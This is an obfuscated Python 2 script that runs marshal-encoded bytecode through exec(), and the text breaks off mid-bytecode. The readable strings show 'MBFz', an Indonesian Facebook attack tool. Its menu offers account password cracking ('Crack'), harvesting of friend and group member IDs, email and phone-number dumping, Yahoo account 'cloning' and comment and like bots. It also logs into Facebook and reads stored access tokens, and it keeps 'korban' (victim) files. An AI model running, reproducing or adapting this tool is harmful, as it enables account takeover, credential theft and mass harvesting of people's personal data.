exec(marshal.loads('''c\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00@\x00\x00\x00sg\x04\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x01\x00l\x02\x00Z\x02\x00d\x00\x00d\x01\x00l\x03\x00Z\x03\x00d\x00\x00d\x01\x00l\x04\x00Z\x04\x00d\x00\x00d\x01\x00l\x05\x00Z\x05\x00d\x00\x00d\x01\x00l\x06\x00Z\x06\x00d\x00\x00d\x01\x00l\x07\x00Z\x07\x00d\x00\x00d\x01\x00l\x08\x00Z\x08\x00d\x00\x00d\x02\x00l\t\x00m\n\x00Z\x0b\x00\x01d\x00\x00d\x03\x00l\x0c\x00m\r\x00Z\r\x00\x01d\x00\x00d\x01\x00l\x0e\x00Z\x0e\x00y\x10\x00d\x00\x00d\x01\x00l\x0f\x00Z\x0f\x00Wn-\x00\x04e\x10\x00k\n\x00r\xd7\x00\x01\x01\x01e\x01\x00j\x11\x00d\x04\x00\x83\x01\x00\x01d\x05\x00GHe\x06\x00j\x12\x00\x83\x00\x00\x01n\x01\x00Xy\x10\x00d\x00\x00d\x01\x00l\x13\x00Z\x13\x00Wn-\x00\x04e\x10\x00k\n\x00r\x17\x01\x01\x01\x01e\x01\x00j\x11\x00d\x04\x00\x83\x01\x00\x01d\x06\x00GHe\x06\x00j\x12\x00\x83\x00\x00\x01n\x01\x00Xg\x00\x00Z\x14\x00d\x07\x00a\x15\x00g\x00\x00Z\x16\x00g\x00\x00Z\x17\x00g\x00\x00Z\x18\x00g\x00\x00Z\x19\x00e\x1a\x00e\x06\x00\x83\x01\x00\x01e\x06\x00j\x1b\x00d\x08\x00\x83\x01\x00\x01e\x13\x00j\x1c\x00\x83\x00\x00Z\x1d\x00e\x1d\x00j\x1e\x00e\x1f\x00\x83\x01\x00\x01e\x1d\x00j \x00e!\x00\x83\x01\x00\x01e\x1d\x00j"\x00e!\x00\x83\x01\x00\x01e\x1d\x00j#\x00e\x07\x00j$\x00\x83\x00\x00\x83\x01\x00\x01e\x1d\x00j%\x00e!\x00\x83\x01\x00\x01e\x1d\x00j&\x00e\x13\x00j\'\x00j(\x00\x83\x00\x00d\t\x00d\n\x00\x83\x01\x01\x01d@\x00g\x01\x00e\x1d\x00_)\x00y\x14\x00d\x00\x00d\r\x00l*\x00m+\x00Z+\x00\x01Wn-\x00\x04e\x10\x00k\n\x00r\x11\x02\x01\x01\x01e\x01\x00j\x11\x00d\x04\x00\x83\x01\x00\x01d\x0e\x00GHe\x06\x00j\x12\x00\x83\x00\x00\x01n\x01\x00Xe+\x00d\x0f\x00d\x10\x00d\x11\x00\x83\x01\x01Z,\x00xD\x00e-\x00d\x11\x00\x83\x01\x00D]6\x00Z.\x00e,\x00j/\x00\x83\x00\x00\x01e\x0b\x00d\x12\x00\x83\x01\x00\x01e\x01\x00j\x11\x00d\x04\x00\x83\x01\x00\x01d\x13\x00GHe,\x00j0\x00\x83\x00\x00\x01q1\x02Wd\x07\x00d\x14\x00\x84\x01\x00Z1\x00d\x15\x00\x84\x00\x00Z2\x00d\x16\x00\x84\x00\x00Z3\x00d\x17\x00\x84\x00\x00Z4\x00d\x18\x00\x84\x00\x00Z5\x00d\x19\x00\x84\x00\x00Z6\x00d\x1a\x00\x84\x00\x00Z7\x00d\x1b\x00\x84\x00\x00Z8\x00d\x1c\x00\x84\x00\x00Z9\x00d\x1d\x00\x84\x00\x00Z:\x00d\x1e\x00\x84\x00\x00Z;\x00d\x1f\x00\x84\x00\x00Z<\x00d \x00\x84\x00\x00Z=\x00d!\x00e\x02\x00j>\x00f\x01\x00d"\x00\x84\x00\x00\x83\x00\x00YZ?\x00d#\x00\x84\x00\x00Z@\x00d$\x00\x84\x00\x00ZA\x00d%\x00\x84\x00\x00ZB\x00d&\x00\x84\x00\x00aC\x00d\'\x00\x84\x00\x00ZD\x00d(\x00\x84\x00\x00ZE\x00d)\x00\x84\x00\x00ZF\x00d*\x00\x84\x00\x00ZG\x00d+\x00\x84\x00\x00ZH\x00d,\x00\x84\x00\x00ZI\x00d-\x00\x84\x00\x00ZJ\x00d.\x00\x84\x00\x00ZK\x00d/\x00\x84\x00\x00ZL\x00d0\x00\x84\x00\x00ZM\x00d1\x00\x84\x00\x00ZN\x00d2\x00\x84\x00\x00ZO\x00d3\x00\x84\x00\x00ZP\x00d4\x00\x84\x00\x00ZQ\x00d5\x00\x84\x00\x00ZR\x00d6\x00\x84\x00\x00ZS\x00d7\x00\x84\x00\x00ZT\x00d8\x00\x84\x00\x00ZU\x00d9\x00\x84\x00\x00ZV\x00e5\x00\x83\x00\x00\x01d:\x00GHd;\x00eW\x00eX\x00tY\x00\x83\x01\x00\x83\x01\x00\x17GHx\x17\x00tY\x00D]\x0f\x00ZZ\x00d<\x00eZ\x00\x17GHq\xf3\x03Wd=\x00eW\x00eX\x00t[\x00\x83\x01\x00\x83\x01\x00\x17GHx\x17\x00t[\x00D]\x0f\x00Z\\\x00d>\x00e\\\x00\x17GHq"\x04Wd?\x00eW\x00eX\x00t]\x00\x83\x01\x00\x83\x01\x00\x17GHe\x06\x00j^\x00j_\x00\x83\x00\x00\x01d:\x00GHe3\x00\x83\x00\x00\x01d\x01\x00S(A\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00sleep(\x01\x00\x00\x00t\x04\x00\x00\x00datet\x05\x00\x00\x00resets&\x00\x00\x00\x1b[1;92mpip2 install -r nganunymous.txts\x1d\x00\x00\x00\x1b[1;92mpip2 install mechanizei\x00\x00\x00\x00t\x04\x00\x00\x00utf8t\x08\x00\x00\x00max_timei\x01\x00\x00\x00s\n\x00\x00\x00User-AgentsR\x00\x00\x00Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16(\x01\x00\x00\x00t\x03\x00\x00\x00Bars\x1c\x00\x00\x00\x1b[1;92mpip2 install progresss\x16\x00\x00\x00\r\x1b[1;91mProsess\x1b[1;97mt\x03\x00\x00\x00maxi2\x00\x00\x00g\x9a\x99\x99\x99\x99\x99\xb9?s\x11\x00\x00\x00\x1b[1;92mLoading...c\x02\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00s\x80\x00\x00\x00xy\x00y\x14\x00t\x00\x00d\x01\x00|\x00\x00\x16\x83\x01\x00}\x02\x00Wn\x19\x00\x01\x01\x01d\x02\x00GHt\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01n\x01\x00X|\x01\x00rZ\x00|\x02\x00j\x04\x00\x83\x00\x00|\x01\x00k\x06\x00rO\x00Pqx\x00d\x03\x00GHq\x03\x00q\x03\x00t\x05\x00|\x02\x00\x83\x01\x00d\x04\x00k\x02\x00rw\x00d\x03\x00GHq\x03\x00q\x03\x00Pq\x03\x00W|\x02\x00S(\x05\x00\x00\x00Ns\x17\x00\x00\x00\x1b[32;1m%s\x1b[31;1m\x1b[1;97ms\x10\x00\x00\x00\x1b[1;91m[!] Errors\x13\x00\x00\x00\x1b[1;91m[!] Masukkani\x00\x00\x00\x00(\x06\x00\x00\x00t\t\x00\x00\x00raw_inputt\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exitt\x05\x00\x00\x00uppert\x03\x00\x00\x00len(\x03\x00\x00\x00t\x01\x00\x00\x00xt\x01\x00\x00\x00qt\x01\x00\x00\x00s(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>t\x06\x00\x00\x00inputT6\x00\x00\x00s \x00\x00\x00\x00\x01\x03\x01\x03\x01\x14\x01\x03\x01\x05\x01\x11\x01\x06\x01\x12\x01\x04\x02\x05\x01\x06\x02\x12\x01\x05\x01\x06\x02\x05\x01c\x02\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00sH\x00\x00\x00xA\x00y\x16\x00t\x00\x00t\x01\x00|\x00\x00\x83\x01\x00\x83\x01\x00}\x02\x00Wn\x0f\x00\x01\x01\x01d\x01\x00GHq\x03\x00n\x01\x00X|\x02\x00|\x01\x00k\x06\x00r;\x00Pq\x03\x00d\x02\x00GHq\x03\x00W|\x02\x00S(\x03\x00\x00\x00Ns\x1b\x00\x00\x00\x1b[1;91m[!] Tidak Ditemukan.s\x1a\x00\x00\x00\x1b[1;91m[!] Tidak Ditemukan(\x02\x00\x00\x00t\x03\x00\x00\x00intR\x10\x00\x00\x00(\x03\x00\x00\x00R\r\x00\x00\x00t\x01\x00\x00\x00tt\x03\x00\x00\x00idn(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>t\x06\x00\x00\x00inputSK\x00\x00\x00s\x14\x00\x00\x00\x00\x01\x03\x01\x03\x01\x16\x01\x03\x01\x05\x01\x07\x01\x0c\x01\x04\x02\t\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s#\x00\x00\x00d\x01\x00GHt\x00\x00j\x01\x00d\x02\x00\x83\x01\x00\x01t\x00\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x03\x00\x00\x00Ns\x1a\x00\x00\x00\x1b[1;91m[!] Keluar Program.s,\x00\x00\x00xdg-open \'https://m.youtube.com/UCuZ3LerXYmrvSKmtuJWutsA\'(\x04\x00\x00\x00R\x08\x00\x00\x00t\x06\x00\x00\x00systemR\t\x00\x00\x00R\n\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>t\x06\x00\x00\x00keluarZ\x00\x00\x00s\x06\x00\x00\x00\x00\x01\x05\x01\r\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\x1f\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01d\x02\x00GHd\x03\x00d\x04\x00\x14GHd\x00\x00S(\x05\x00\x00\x00NR\x02\x00\x00\x00s\xaf\x03\x00\x00\n\x1b[1;31m __.-/|\n \\`\x1b[1;97mo\x1b[1;31m_\x1b[1;97mO\x1b[1;31m\'\n \x1b[1;93m=\x1b[1;31m( )\x1b[1;93m= \x1b[1;34m+------+\n \x1b[1;35mU\x1b[1;31m| \x1b[1;34m | \x1b[1;37mMBF\x1b[1;91mz \x1b[1;34m|\n\x1b[1;31m /\\ /\\ / | \x1b[1;34m+------+\n\x1b[1;31m ) /^\\) ^\\/ \x1b[1;37m_)\x1b[1;31m\\ \x1b[1;34m |\n\x1b[1;31m ) /^\\/ \x1b[1;37m _)\x1b[1;31m \\ \x1b[1;34m |\n\x1b[1;31m ) _ / / \x1b[1;37m_) \x1b[1;31m \\___\x1b[1;34m|\x1b[1;31m_\n\x1b[1;33m /\\ \x1b[1;31m)/\\/ || | \x1b[1;37m)_)\x1b[1;31m\\___\x1b[1;37m,\x1b[1;34m|\x1b[1;37m))\n\x1b[1;33m< > \x1b[1;31m |\x1b[1;37m(,,) )__) \x1b[1;34m |\n\x1b[1;31m || / \\\x1b[1;37m)___)\x1b[1;31m\\\n\x1b[1;31m | \\____( )___) )____\n\x1b[1;31m \\______(_______\x1b[1;37m;;;\x1b[1;31m)__\x1b[1;37m;;;\x1b[1;31m) \x1b[1;93mCopyright, @\x1b[4mpirmansx\x1b[0m\n\x1b[1;91m.:[ \x1b[1;92mCompiler\x1b[1;97m : \x1b[1;96mZeDD\n\x1b[1;91m | \x1b[1;92mYoutube\x1b[1;97m : UCuZ3LerXYmrvSKmtuJWutsA\n\x1b[1;91m | \x1b[1;92mInstaG\x1b[1;97m : @abdulbasitkambo\n\x1b[1;91m | \x1b[1;92mGitHub\x1b[1;97m : \x1b[4mhttps://github.com/CLB-09\x1b[0mi2\x00\x00\x00s\x08\x00\x00\x00\x1b[1;97m_(\x02\x00\x00\x00R\x08\x00\x00\x00R\x15\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>t\x08\x00\x00\x00bannerid`\x00\x00\x00s\x06\x00\x00\x00\x00\x01\r\x12\x05\x01c\x00\x00\x00\x00\x06\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00sU\x01\x00\x00y\xfc\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00}\x00\x00t\x02\x00j\x03\x00d\x03\x00|\x00\x00\x17\x83\x01\x00}\x01\x00t\x04\x00j\x05\x00|\x01\x00j\x06\x00\x83\x01\x00}\x02\x00|\x02\x00d\x04\x00\x19}\x03\x00|\x02\x00d\x05\x00\x19}\x04\x00t\x07\x00j\x08\x00|\x02\x00d\x04\x00\x19\x83\x01\x00\x01t\t\x00j\n\x00d\x06\x00\x83\x01\x00\x01d\x07\x00|\x03\x00\x16GHd\x08\x00|\x04\x00\x16GHt\x0b\x00j\x0c\x00\x83\x00\x00}\x05\x00|\x05\x00j\r\x00d\t\x00\x83\x01\x00GHd\n\x00GHd\x0b\x00GHd\x0c\x00GHd\r\x00GHd\x0e\x00GHd\x0f\x00GHd\x10\x00GHd\x11\x00GHd\x12\x00GHd\x13\x00GHd\x14\x00GHd\x15\x00d\x16\x00\x14GHd\x17\x00GHd\x18\x00GHd\x19\x00GHd\x1a\x00GHd\x1b\x00GHt\x0e\x00\x83\x00\x00\x01WnR\x00\x04t\x0f\x00t\x10\x00f\x02\x00k\n\x00rP\x01\x01\x01\x01t\t\x00j\n\x00d\x06\x00\x83\x01\x00\x01d\x1c\x00GHd\x15\x00d\x16\x00\x14GHd\x17\x00GHd\x18\x00GHd\x19\x00GHd\x1a\x00GHd\x1b\x00GHt\x0e\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(\x1d\x00\x00\x00Ns\t\x00\x00\x00login.txtt\x01\x00\x00\x00rs+\x00\x00\x00https://graph.facebook.com/me?access_token=t\x04\x00\x00\x00namet\x02\x00\x00\x00idR\x02\x00\x00\x00sJ\x00\x00\x00\x1b[1;31m __.-/| \x1b[1;91m[+]---\x1b[1;97m %s \x1b[1;91m---[+]s[\x00\x00\x00 \\`\x1b[1;97mo\x1b[1;31m_\x1b[1;97mO\x1b[1;31m\' \x1b[1;91m[+] \x1b[1;92mID \x1b[1;97m : %ssa\x00\x00\x00 \x1b[1;93m=\x1b[1;31m( )\x1b[1;93m= \x1b[1;34m+------+ \x1b[1;91m[+] \x1b[1;92mTGL \x1b[1;97m: %d %b %Ys\x86\x00\x00\x00 \x1b[1;35mU\x1b[1;31m| \x1b[1;34m | \x1b[1;37mMBF\x1b[1;91mz \x1b[1;34m| \x1b[1;91m[+] \x1b[1;92mURL \x1b[1;97m: \x1b[4mhttps://m.facebook.com/\x1b[0ms+\x00\x00\x00\x1b[1;31m /\\ /\\ / | \x1b[1;34m+------+s5\x00\x00\x00\x1b[1;31m ) /^\\) ^\\/ \x1b[1;37m_)\x1b[1;31m\\ \x1b[1;34m |s5\x00\x00\x00\x1b[1;31m ) /^\\/ \x1b[1;37m _)\x1b[1;31m \\ \x1b[1;34m |s=\x00\x00\x00\x1b[1;31m ) _ / / \x1b[1;37m_) \x1b[1;31m \\___\x1b[1;34m|\x1b[1;31m_sL\x00\x00\x00\x1b[1;33m /\\ \x1b[1;31m)/\\/ || | \x1b[1;37m)_)\x1b[1;31m\\___\x1b[1;37m,\x1b[1;34m|\x1b[1;37m))s5\x00\x00\x00\x1b[1;33m< > \x1b[1;31m |\x1b[1;37m(,,) )__) \x1b[1;34m |s*\x00\x00\x00\x1b[1;31m || / \\\x1b[1;37m)___)\x1b[1;31m\\s!\x00\x00\x00\x1b[1;31m | \\____( )___) )____sb\x00\x00\x00\x1b[1;31m \\______(_______\x1b[1;37m;;;\x1b[1;31m)__\x1b[1;37m;;;\x1b[1;31m) \x1b[1;93mCopyright, @\x1b[4mpirmansx\x1b[0ms\xd8\x00\x00\x00\x1b[1;91m.:[ \x1b[1;92mCompiler\x1b[1;97m : \x1b[1;96mZeDD\n\x1b[1;91m | \x1b[1;92mYoutube\x1b[1;97m : UCuZ3LerXYmrvSKmtuJWutsA\n\x1b[1;91m | \x1b[1;92mInstaG\x1b[1;97m : @abdulbasitkambo\n\x1b[1;91m | \x1b[1;92mGitHub\x1b[1;97m : \x1b[4mhttps://github.com/CLB-09\x1b[0miK\x00\x00\x00s\x08\x00\x00\x00\x1b[1;97m_s\x9d\x00\x00\x00\x1b[1;91m[\x1b[1;97m1.\x1b[1;91m] \x1b[1;92mLogin \x1b[1;91m[\x1b[1;97m6.\x1b[1;91m] \x1b[1;92mAmbil Nomor \x1b[1;91m[\x1b[1;97m11.\x1b[1;91m] \x1b[1;92mHapus data mbfzs\x94\x00\x00\x00\x1b[1;91m[\x1b[1;97m2.\x1b[1;91m] \x1b[1;92mAmbil ID teman \x1b[1;91m[\x1b[1;97m7.\x1b[1;91m] \x1b[1;92mLihat Info Teman \x1b[1;91m[\x1b[1;97m12.\x1b[1;91m] \x1b[1;91mKeluarsh\x00\x00\x00\x1b[1;91m[\x1b[1;97m3.\x1b[1;91m] \x1b[1;92mAmbil ID teman dari grup \x1b[1;91m[\x1b[1;97m8.\x1b[1;91m] \x1b[1;92mCloning Yahoosd\x00\x00\x00\x1b[1;91m[\x1b[1;97m4.\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m[\x1b[1;97m9.\x1b[1;91m] \x1b[1;92mBot Komensd\x00\x00\x00\x1b[1;91m[\x1b[1;97m5.\x1b[1;91m] \x1b[1;92mAmbil email \x1b[1;91m[\x1b[1;97m10.\x1b[1;91m] \x1b[1;92mBot Likes\xaf\x03\x00\x00\n\x1b[1;31m __.-/|\n \\`\x1b[1;97mo\x1b[1;31m_\x1b[1;97mO\x1b[1;31m\'\n \x1b[1;93m=\x1b[1;31m( )\x1b[1;93m= \x1b[1;34m+------+\n \x1b[1;35mU\x1b[1;31m| \x1b[1;34m | \x1b[1;37mMBF\x1b[1;91mz \x1b[1;34m|\n\x1b[1;31m /\\ /\\ / | \x1b[1;34m+------+\n\x1b[1;31m ) /^\\) ^\\/ \x1b[1;37m_)\x1b[1;31m\\ \x1b[1;34m |\n\x1b[1;31m ) /^\\/ \x1b[1;37m _)\x1b[1;31m \\ \x1b[1;34m |\n\x1b[1;31m ) _ / / \x1b[1;37m_) \x1b[1;31m \\___\x1b[1;34m|\x1b[1;31m_\n\x1b[1;33m /\\ \x1b[1;31m)/\\/ || | \x1b[1;37m)_)\x1b[1;31m\\___\x1b[1;37m,\x1b[1;34m|\x1b[1;37m))\n\x1b[1;33m< > \x1b[1;31m |\x1b[1;37m(,,) )__) \x1b[1;34m |\n\x1b[1;31m || / \\\x1b[1;37m)___)\x1b[1;31m\\\n\x1b[1;31m | \\____( )___) )____\n\x1b[1;31m \\______(_______\x1b[1;37m;;;\x1b[1;31m)__\x1b[1;37m;;;\x1b[1;31m) \x1b[1;93mCopyright, @\x1b[4mpirmansx\x1b[0m\n\x1b[1;91m.:[ \x1b[1;92mCompiler\x1b[1;97m : \x1b[1;96mZeDD\n\x1b[1;91m | \x1b[1;92mYoutube\x1b[1;97m : UCuZ3LerXYmrvSKmtuJWutsA\n\x1b[1;91m | \x1b[1;92mInstaG\x1b[1;97m : @abdulbasitkambo\n\x1b[1;91m | \x1b[1;92mGitHub\x1b[1;97m : \x1b[4mhttps://github.com/CLB-09\x1b[0m(\x11\x00\x00\x00t\x04\x00\x00\x00opent\x04\x00\x00\x00readt\x08\x00\x00\x00requestst\x03\x00\x00\x00gett\x04\x00\x00\x00jsont\x05\x00\x00\x00loadst\x04\x00\x00\x00textt\x01\x00\x00\x00nt\x06\x00\x00\x00appendR\x08\x00\x00\x00R\x15\x00\x00\x00R\x01\x00\x00\x00t\x05\x00\x00\x00todayt\x08\x00\x00\x00strftimet\x05\x00\x00\x00piliht\x08\x00\x00\x00KeyErrort\x07\x00\x00\x00IOError(\x06\x00\x00\x00t\x05\x00\x00\x00tokenR\x18\x00\x00\x00t\x01\x00\x00\x00aR\x19\x00\x00\x00R\x1a\x00\x00\x00t\x07\x00\x00\x00tanggal(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>t\x06\x00\x00\x00tampilv\x00\x00\x00sP\x00\x00\x00\x00\x01\x03\x01\x15\x01\x13\x01\x12\x01\n\x01\n\x01\x11\x01\r\x01\t\x01\t\x01\x0c\x01\x0e\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x04\x05\x01\t\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x0b\x02\x13\x01\r\x12\x05\x01\t\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x0e\x00\x00\x00C\x00\x00\x00s\xbf\x01\x00\x00t\x00\x00d\x01\x00d\x02\x00d\x03\x00d\x04\x00d\x05\x00d\x06\x00d\x07\x00d\x08\x00d\t\x00d\n\x00d\x0b\x00d\x0c\x00d\r\x00g\x0c\x00\x83\x02\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00rI\x00t\x01\x00\x83\x00\x00\x01nr\x01|\x00\x00d\x03\x00k\x02\x00r_\x00t\x02\x00\x83\x00\x00\x01n\\\x01|\x00\x00d\x04\x00k\x02\x00ru\x00t\x03\x00\x83\x00\x00\x01nF\x01|\x00\x00d\x05\x00k\x02\x00r\x8b\x00t\x04\x00\x83\x00\x00\x01n0\x01|\x00\x00d\x06\x00k\x02\x00r\xa1\x00t\x05\x00\x83\x00\x00\x01n\x1a\x01|\x00\x00d\x07\x00k\x02\x00r\xb7\x00t\x06\x00\x83\x00\x00\x01n\x04\x01|\x00\x00d\x08\x00k\x02\x00r\xd4\x00t\x07\x00\x83\x00\x00\x01t\x08\x00\x83\x00\x00\x01n\xe7\x00|\x00\x00d\t\x00k\x02\x00r\xea\x00t\t\x00\x83\x00\x00\x01n\xd1\x00|\x00\x00d\n\x00k\x02\x00r\x00\x01t\n\x00\x83\x00\x00\x01n\xbb\x00|\x00\x00d\x0b\x00k\x02\x00r\x16\x01t\x0b\x00\x83\x00\x00\x01n\xa5\x00|\x00\x00d\x0c\x00k\x02\x00r\xa5\x01d\x0e\x00GHt\x0c\x00j\r\x00d\x0f\x00\x83\x01\x00\x01t\x0c\x00j\r\x00d\x10\x00\x83\x01\x00\x01t\x0c\x00j\r\x00d\x11\x00\x83\x01\x00\x01t\x0c\x00j\r\x00d\x12\x00\x83\x01\x00\x01t\x0c\x00j\r\x00d\x13\x00\x83\x01\x00\x01t\x0c\x00j\r\x00d\x14\x00\x83\x01\x00\x01t\x0c\x00j\r\x00d\x15\x00\x83\x01\x00\x01t\x0e\x00d\x03\x00\x83\x01\x00\x01d\x16\x00GHt\x0e\x00d\x02\x00\x83\x01\x00\x01t\x0f\x00\x83\x00\x00\x01n\x16\x00|\x00\x00d\r\x00k\x02\x00r\xbb\x01t\x0f\x00\x83\x00\x00\x01n\x00\x00d\x00\x00S(\x17\x00\x00\x00Ns\x14\x00\x00\x00\x1b[1;91mmbfz\x1b[1;97m> i\x01\x00\x00\x00i\x02\x00\x00\x00i\x03\x00\x00\x00i\x04\x00\x00\x00i\x05\x00\x00\x00i\x06\x00\x00\x00i\x07\x00\x00\x00i\x08\x00\x00\x00i\t\x00\x00\x00i\n\x00\x00\x00i\x0b\x00\x00\x00i\x0c\x00\x00\x00s+\x00\x00\x00\x1b[1;91m[%] \x1b[1;92mMenghapus Data \x1b[1;97m...s\x0f\x00\x00\x00rm -f teman.txts\x0f\x00\x00\x00rm -f login.txts\x11\x00\x00\x00rm -f IDgroup.txts\x10\x00\x00\x00rm -f korban.txts\x11\x00\x00\x00rm -f korbang.txts\x0c\x00\x00\x00rm -rf emails\r\x00\x00\x00rm -rf sampahs\x1a\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mSelesai.(\x10\x00\x00\x00R\x14\x00\x00\x00R)\x00\x00\x00t\x07\x00\x00\x00ambilidt\x07\x00\x00\x00idgroupt\n\x00\x00\x00pilihcrackt\x05\x00\x00\x00dumpmt\t\x00\x00\x00dumpnomort\x07\x00\x00\x00getdatat\x06\x00\x00\x00searcht\x05\x00\x00\x00clonet\x05\x00\x00\x00koment\x05\x00\x00\x00reactR\x08\x00\x00\x00R\x15\x00\x00\x00t\x06\x00\x00\x00tenangR\x16\x00\x00\x00(\x01\x00\x00\x00t\x06\x00\x00\x00karjok(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>R&\x00\x00\x00\xb5\x00\x00\x00sJ\x00\x00\x00\x00\x013\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\x07\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\n\x01\x05\x01\n\x01\n\x01\x0c\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\x1f\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01d\x02\x00GHd\x03\x00d\x04\x00\x14GHd\x00\x00S(\x05\x00\x00\x00NR\x02\x00\x00\x00s\xaf\x03\x00\x00\n\x1b[1;31m __.-/|\n \\`\x1b[1;97mo\x1b[1;31m_\x1b[1;97mO\x1b[1;31m\'\n \x1b[1;93m=\x1b[1;31m( )\x1b[1;93m= \x1b[1;34m+------+\n \x1b[1;35mU\x1b[1;31m| \x1b[1;34m | \x1b[1;37mMBF\x1b[1;91mz \x1b[1;34m|\n\x1b[1;31m /\\ /\\ / | \x1b[1;34m+------+\n\x1b[1;31m ) /^\\) ^\\/ \x1b[1;37m_)\x1b[1;31m\\ \x1b[1;34m |\n\x1b[1;31m ) /^\\/ \x1b[1;37m _)\x1b[1;31m \\ \x1b[1;34m |\n\x1b[1;31m ) _ / / \x1b[1;37m_) \x1b[1;31m \\___\x1b[1;34m|\x1b[1;31m_\n\x1b[1;33m /\\ \x1b[1;31m)/\\/ || | \x1b[1;37m)_)\x1b[1;31m\\___\x1b[1;37m,\x1b[1;34m|\x1b[1;37m))\n\x1b[1;33m< > \x1b[1;31m |\x1b[1;37m(,,) )__) \x1b[1;34m |\n\x1b[1;31m || / \\\x1b[1;37m)___)\x1b[1;31m\\\n\x1b[1;31m | \\____( )___) )____\n\x1b[1;31m \\______(_______\x1b[1;37m;;;\x1b[1;31m)__\x1b[1;37m;;;\x1b[1;31m) \x1b[1;93mCopyright, @\x1b[4mpirmansx\x1b[0m\n\x1b[1;91m.:[ \x1b[1;92mCompiler\x1b[1;97m : \x1b[1;96mZeDD\n\x1b[1;91m | \x1b[1;92mYoutube\x1b[1;97m : UCuZ3LerXYmrvSKmtuJWutsA\n\x1b[1;91m | \x1b[1;92mInstaG\x1b[1;97m : @abdulbasitkambo\n\x1b[1;91m | \x1b[1;92mGitHub\x1b[1;97m : \x1b[4mhttps://github.com/CL\x1b[0mi2\x00\x00\x00s\x08\x00\x00\x00\x1b[1;97m_(\x02\x00\x00\x00R\x08\x00\x00\x00R\x15\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>t\x0b\x00\x00\x00banner_grup\xdd\x00\x00\x00s\x06\x00\x00\x00\x00\x01\r\x12\x05\x01c\x00\x00\x00\x00\x06\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00s\xfe\x00\x00\x00d\x01\x00GHt\x00\x00d\x02\x00\x83\x01\x00}\x00\x00t\x00\x00d\x03\x00\x83\x01\x00}\x01\x00d\x04\x00GHt\x01\x00d\x05\x00\x83\x01\x00\x01t\x02\x00j\x03\x00d\x06\x00d\x07\x00\x83\x00\x01\x01|\x00\x00t\x02\x00j\x04\x00d\x08\x00<|\x01\x00t\x02\x00j\x04\x00d\t\x00<t\x02\x00j\x05\x00\x83\x00\x00\x01t\x02\x00j\x06\x00\x83\x00\x00}\x02\x00d\n\x00|\x02\x00k\x06\x00s\x84\x00d\x0b\x00|\x02\x00k\x06\x00r\xbb\x00d\x0c\x00GHd\r\x00d\x0e\x00\x14GHt\x07\x00d\x0f\x00\x83\x01\x00}\x03\x00t\x08\x00d\x10\x00\x83\x01\x00\x01t\x01\x00d\x11\x00\x83\x01\x00\x01d\x10\x00a\t\x00n?\x00d\x12\x00|\x02\x00k\x06\x00r\xe2\x00d\x13\x00GHt\x07\x00d\x14\x00\x83\x01\x00}\x04\x00t\n\x00\x83\x00\x00\x01n\x18\x00d\x15\x00GHt\x07\x00d\x14\x00\x83\x01\x00}\x05\x00t\n\x00\x83\x00\x00\x01d\x00\x00S(\x16\x00\x00\x00Ns.\x00\x00\x00\x1b[1;91m[!] \x1b[1;92mLOGIN AKUN FACEBOOK s+\x00\x00\x00\x1b[1;91m[+] \x1b[1;36mUsername \x1b[1;91m:\x1b[1;92m s+\x00\x00\x00\x1b[1;91m[+] \x1b[1;36mPassword \x1b[1;91m:\x1b[1;92m s!\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mSedang Masuk...s\x16\x00\x00\x00https://m.facebook.comt\x02\x00\x00\x00nri\x00\x00\x00\x00t\x05\x00\x00\x00emailt\x04\x00\x00\x00passs\x0b\x00\x00\x00save-devicet\x06\x00\x00\x00m_sesss!\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mLogin berhasil.i2\x00\x00\x00s\x08\x00\x00\x00\x1b[1;97m=s\x1a\x00\x00\x00\x1b[1;91m[+] 